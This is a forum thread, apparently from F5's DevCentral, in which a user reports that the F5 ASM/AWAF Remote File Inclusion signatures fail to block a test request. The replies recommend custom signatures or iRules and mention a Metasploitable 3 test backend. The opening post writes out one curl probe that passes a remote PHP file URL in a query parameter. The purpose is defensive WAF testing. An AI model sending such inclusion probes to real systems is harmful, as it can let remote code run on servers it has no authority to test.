For more information regarding the security incident at F5, the actions we are taking to address it, and our ongoing efforts to protect our customers, click here.

Forum Discussion

Nikoolayy1's avatar
Nikoolayy1
Icon for MVP rankMVP
Jul 21, 2023
Solved

F5 ASM/AWAF Remote File Inclusion signatures do not block http:// or https:// in the form parameter

Hello,   I tested some pentesting attacks like "curl https://x.x.x.x/?niki=http://1.1.1.1/file.php -kv" and the RFI/RFE attack does not get blocked even with RFI signatures beeing enabled as ment...
security
  • Nikoolayy1's avatar
    Nikoolayy1
    Jul 27, 2023

    I tested this on other vendors and it is the same as the info I got is that there are no default signatures for this RFI attack as it will cause many issues an false positives, so you need to make a custom signature/irule to block this for the specific vunrable parameter.

     

    Outside of that for XC Distributed Cloud the Service policy rules seem the way to go for configuring something like signatures:

     

     

Nikoolayy1's avatar
Nikoolayy1
Icon for MVP rankMVP
Jul 23, 2023

Yes, maybe I am doing the test wrong, still another big issue is that Nginx App Protect also has the option for custom signatures (Configuration | NGINX Ingress Controller) but for now XC Distributed cloud does not and even with all signatures enabled and not in staging the RFI attack is not blocked on XC.

 

As a test backend with metasploitable 3 you can exploit this vunrability as seen in your picture with the query "page" parameter.